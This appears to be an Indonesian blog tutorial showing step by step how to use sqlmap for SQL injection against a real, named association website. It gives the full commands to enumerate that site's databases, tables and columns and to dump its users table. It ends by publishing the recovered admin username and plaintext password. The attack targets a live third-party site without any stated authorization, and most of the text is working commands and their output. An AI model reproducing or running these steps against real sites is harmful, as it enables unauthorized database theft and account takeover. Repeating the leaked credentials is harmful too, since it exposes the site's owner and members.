![[Image: 9jfuy9.png]](http://i50.tinypic.com/9jfuy9.png)
Tools Yang diperlukan :
- SQLMAP = Otw Gogel :haha
- Python = http://www.python.org/download/
Tutorial :
- Buka Sqlmap nya. dengan Command/CMD atau Terminal
- Masukan
Quote:[Directory anda menyimpan]\sqlmap.py -u http://www.bayareaassn.com/memberinfo.php?id=10 –dbs
![[Image: 9jfuy9.png]](http://i50.tinypic.com/9jfuy9.png)
Lalu ente
- Tunggu Sampai Scan Selesai
Quote:available databases [2]:
[*] bayar10_bayareaassn
[*] information_schema
![[Image: 51dc35.png]](http://i46.tinypic.com/51dc35.png)
Yang Berwarna Merah itu adalah Nama Databasenya
- Sekarang Masukan lagi
[Directory anda menyimpan]\sqlmap.py -u http://www.bayareaassn.com/memberinfo.php?id=10 -D bayar10_bayareaassn –tables
Image has been scaled down 12% (600×302). Click this bar to view original image (676×340). Click image to open in new window.
![[Image: 21khw93.png]](http://i46.tinypic.com/21khw93.png)
Tunggu Sampai scan selesai
- Nanti Akan Muncul Tables
Quote:+————————–+
| areas |
| categories |
| featured |
| fields |
| jobfields |
| member_areas |
| member_categories |
| member_fields |
| members |
| projects |
| users |
+————————–+
![[Image: ifcwaw.png]](http://i46.tinypic.com/ifcwaw.png)
Lalu Kita Pilih Tables users
- Masukan
Quote:[Directory anda menyimpan]\sqlmap.py -u http://www.bayareaassn.com/memberinfo.php?id=10 -D bayar10_bayareaassn -T users –columnsDan tunggu sampai scan selesai
Quote:[3 columns]
+———-+————–+
| Column | Type |
+———-+————–+
| id | int(255) |
| password | varchar(255) |
| username | varchar(255) |
+———-+————–+
![[Image: r076f8.png]](http://i50.tinypic.com/r076f8.png)
- Sekarang tinggal kita Dump
Username :
Quote:\sqlmap.py -u http://www.bayareaassn.com/memberinfo.php?id=10 -D bayar10_bayareaassn -T users -C username –dumpPassword :
Quote:\sqlmap.py -u http://www.bayareaassn.com/memberinfo.php?id=10 -D bayar10_bayareaassn -T users -C password –dump
![[Image: 34i60c1.png]](http://i48.tinypic.com/34i60c1.png)
Username : admin
Password : a11enn0wSekian tutorial dari Saya
author :
https://plus.google.com/113807636492921501341?prsrc=2
0 komentar:
Posting Komentar